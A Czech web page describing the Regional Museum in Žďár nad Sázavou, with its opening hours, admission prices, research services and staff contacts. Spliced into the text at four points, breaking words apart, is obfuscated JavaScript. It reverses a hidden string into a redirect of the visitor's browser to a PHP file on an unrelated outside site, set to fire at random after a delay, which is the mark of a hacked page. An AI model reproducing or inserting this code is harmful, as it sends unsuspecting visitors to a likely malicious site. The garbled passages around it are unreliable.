Rainbow page separator

Regionální muzeum Žďár nad Sázavou

Muzeum města sídlí v pros[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torách městské Tvrze pod kostelem sv. Prokopa v  his[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torickém centru města a je celoročně otevřeno. Na Tvrzi se střídají různé regionální výstavy, výstavy umění, dále prezentace v rámci různých festivalů a naučné výstavy. Součástí muzea je i budova Moučkova domu, kde se nachází trvalá expozice dějin města, expozice prvorepublikového obchodu a měšťanského salónu. Pokladna pro výstavy na Tvrzi i Moučkově domě se nachází v budově Tvrze. Zde si také můžete zakoupit pohlednice Žďáru nad Sázavou, jeho upomínkové předměty a také zajímavé publikace.

regionální_muzeum

Otevírací doba Regionálního muzea (Tvrz) a Moučkova domu:

Tvrz je otevřena denně kromě pondělí od 9:00 do 12:00 a od 12:30 do 17:00 hod.

Moučkův dům je přístupný denně kromě pondělí.

Prohlídky začínají vždy v 9:00, 10:00, 11:00 a ve 13:00, 14:00, 15:00 a 16:00 hod.

Začátek prohlídky Moučkova domu je v hlavní budově na Tvrzi.

Vstupné:

Dospělí 10 Kč; důchodci, studenti a děti do patnácti let 5 Kč; předškolní děti a pedagogický dozor zdarma.

Skupinové návštěvy (třídy, zájezdy) se mohou objednat v pracovní dny na tel. č. 566 688 116. Přednost mají objednané výpravy.

Aktuální výstavy naleznete na oficiálních stránkách muzea.

 

Další služby a možnosti muzea

Pro veřejnost pracovníci muzea poskytují také odborné konzultace, konzultují seminární vysokoškolské i jiné práce, realizují odborné přednášky. Máte-li zájem si přečíst něco zajímavého z knihovny, kroniky nebo archívu Regionálního muzea? Můžete tak učinit prezenčně (knihy si nelze vypůjčit domů) v „badatelně“. Bádání v badatelně archivu Regionálního muzea se řídí dle archivního zákona.

Regionální muzeum kontakty

GPS: 49°33\’49.2″N 15°56\’16.3″E

Adresa: Tvrz 8, 591 01, Žďár nad Sázavou

Telefon: 566 688 116

E-mail: info@muzeumzdar.cz

Oficiální stránky: www.muzeumzdar.cz

Facebook: www.facebook.com/muzeumzdar

Kontakty na pracovníky muzea:

 

Vedoucí muzea a přírodovědné oddělení

Zdeněk Málek   Tel: 566 688 114        e-mail: zdenek.malek@zdarns.cz

Oddělení his[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torie

Mgr. Miloslav Lopaur        e-mail: miloslav.lopaur@zdarns.cz

Mgr. Stanislav Mikule        e-mail: stanislav.mikule@zdarns.cz

PhDr. Pavel Benedikt Elbl       e-mail: pavel.elbl@zdarns.cz

Tel.: 566 688 116

Knihovna a archiv

Mgr. Miloslav Lopaur                                       Tel.: 566 688 116                                        E-mail: miloslav.lopaur@zdarns.cz

Kronika města Žďáru nad Sázavou

PhDr. Pavel Benedikt Elbl  e-mail: pavel.elbl@zdarns.cz Tel.: 566 688 116

Výtvarnictví a průvodcovská služba

Kamila Dvořáková    tel.: 566 688 116    e-mail: kamila.dvorakova@zdarns.cz

Marie Šikulová

Jarmila Krejčová

Ivona Wasserbauerová

Fakturační adresa: Měs[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár n. Sáz., org. slož. Regionální muzeum, Žižkova 1, 591 01  Žďár nad Sázavou (IČO: 00295841)

Těšíme se na Vaši návštěvu!